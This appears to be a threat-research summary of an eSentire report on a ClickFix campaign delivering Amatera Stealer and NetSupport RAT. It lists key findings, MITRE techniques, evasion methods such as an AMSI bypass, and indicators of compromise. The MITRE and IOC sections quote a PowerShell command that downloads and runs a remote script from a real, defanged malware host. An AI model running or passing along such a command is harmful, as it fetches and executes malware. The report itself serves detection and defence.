Threat Research

EVALUSION Campaign Delivers Amatera Stealer and NetSupport RAT

Esentire
EVALUSION Campaign Delivers Amatera Stealer and NetSupport RAT

eSentire’s TRU discovered campaigns using ClickFix for initial access to deploy Amatera Stealer (a rebranded ACR/AcridRain) and NetSupport RAT, with Amatera leveraging advanced evasion (WoW64 syscalls, AMSI bypass) and extensive crypto-wallet/password manager theft capabilities. eSentire published decryption helpers and detection guidance, and recommends mitigations including disabling mshta.exe, removing the Run prompt, PSAT, and partnering with 24/7 MDR services. #Amatera #NetSupport

Keypoints

  • Amatera Stealer is a rebranded iteration of ACR (AcridRain) Stealer sold after source-code transfer and provides broad data exfiltration focused on crypto wallets, browsers, messaging apps, FTP and email clients.
  • Initial access commonly uses a social-engineering ClickFix vector that coerces victims to execute commands in the Windows Run prompt, delivering multi-stage PowerShell and a .NET downloader that retrieves encrypted payloads from MediaFire.
  • Amatera employs advanced evasion: WoW64 syscalls to bypass user-mode hooks, AMSI bypass by overwriting AmsiScanBuffer in clr.dll, and encrypted TLS/C2 communications with AES-256-CBC and custom XOR/base64 obfuscation for configuration and C2 addresses.
  • The loader supports fileless and file-based execution, can selectively deploy follow-on payloads (NetSupport RAT, Amadey, Vidar, Lumma) based on environment checks (domain membership or presence of valuable files), and uses markers in JPGs to hide payloads.
  • eSentire provides tooling and CyberChef recipes to extract Amatera configurations, decrypt C2 communications, and dump in-memory payloads (e.g., interrupting SetThreadContext prior to Pure Crypter stages).
  • Observed NetSupport deployments included a licensee string “KAKAN” and C2s like 45.94.47.224 and 91.98.229.246; sample C2 extraction revealed undetected hosts on VirusTotal at the time of analysis.
  • Recommended mitigations: disable mshta.exe via AppLocker/WDAC, remove the Run prompt via GPO, implement phishing/security awareness training, and engage 24/7 MDR for rapid detection and response.

MITRE Techniques

  • [T1059] Command and Scripting Interpreter – Used via PowerShell to execute multi-stage scripts and download payloads: “…powershell.exe -NoProfile -ExecutionPolicy Bypass -Command ‘IEX (New-Object Net.WebClient).DownloadString(…)’”.
  • [T1190] Exploit Public-Facing Application (initial access vector via social engineering of Run prompt) – ClickFix social-engineering coerces victims to run commands in Run Prompt: “…compel them to execute malicious commands in the Windows Run Prompt…leading to the delivery of Amatera”.
  • [T1105] Ingress Tool Transfer – .NET downloader retrieves encrypted payloads from MediaFire and decrypts via RC2: “downloads an encrypted payload from MediaFire, decrypts it via RC2, and invokes the next stage”.
  • [T1547] Boot or Logon Autostart Execution (loader persistence/execute additional payloads) – Loader can write and execute .ps1 or drop/execute NetSupport client (systeminfo.exe) from decrypted zip archive as part of follow-on execution flow.
  • [T1027] Obfuscated Files or Information – Amatera uses XOR/base64 obfuscation and encrypted C2 strings, e.g., C2 stored as “an encrypted base64 string” and decrypted with XOR key “852149723×00”.
  • [T1569] System Services: Service Execution (abuse of legitimate RMM) – NetSupport Manager (legitimate RMM) abused for remote access after being dropped by Amatera: “Amatera subsequently dropping NetSupport Manager…deployed by threat actors for unauthorized and full remote access”.
  • [T1106] Native API – Uses WoW64 syscalls and NtDeviceIoControl to establish C2 via “DeviceAfdEndpoint” to evade API hooking: “uses a WoW64 syscall to NtDeviceIoControl…via the Auxiliary Function Driver device ‘DeviceAfdEndpoint’”.
  • [T1562] Impair Defenses – AMSI bypass by locating and overwriting “AmsiScanBuffer” string in clr.dll memory so GetProcAddress fails: “overwrites it with null bytes…the GetProcAddress call is passed a pointer to a null-byte filled buffer and the call fails”.
  • [T1041] Exfiltration Over C2 Channel – Stolen data bundled into zip archives and POSTed to C2, with a GUID-named text file fingerprint: “Harvested data is collected into a zip archive and sent via HTTP POST to the C2…named like .txt”.

Indicators of Compromise

  • [IP Address] C2 and payload hosts – examples: 87.120.219.26 (payload host serving PowerShell), 45.94.47.224 (NetSupport C2), and 91.98.229.246 (extracted C2 used in analysis).
  • [Domain/Hostname] Bogus Host header value used in requests – example: aether100.pronotification.table.core.windows.net (bogus Host header observed in HTTP requests).
  • [File Names / Artifacts] Deployed filenames and markers – examples: systeminfo.exe (NetSupport client executed), NSM.lic (NetSupport license file with licensee “KAKAN”).
  • [Configuration strings / Keys] Hard-coded XOR and AES keys – examples: XOR key “852149723×00” used for C2/config decryption; AES key bytes shown in sample stack (and included in CyberChef recipe), and AES IV patterns (0x55 for requests, first 16 bytes of response for responses).
  • [PowerShell Command Lines] Execution command examples – “powershell.exe -NoProfile -ExecutionPolicy Bypass -Command ‘IEX (New-Object Net.WebClient).DownloadString(‘hxxp://87.120.219.26/P9m4H7S2FqDTof’)’”.

Read more: https://www.esentire.com/blog/evalusion-campaign-delivers-amatera-stealer-and-netsupport-rat

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint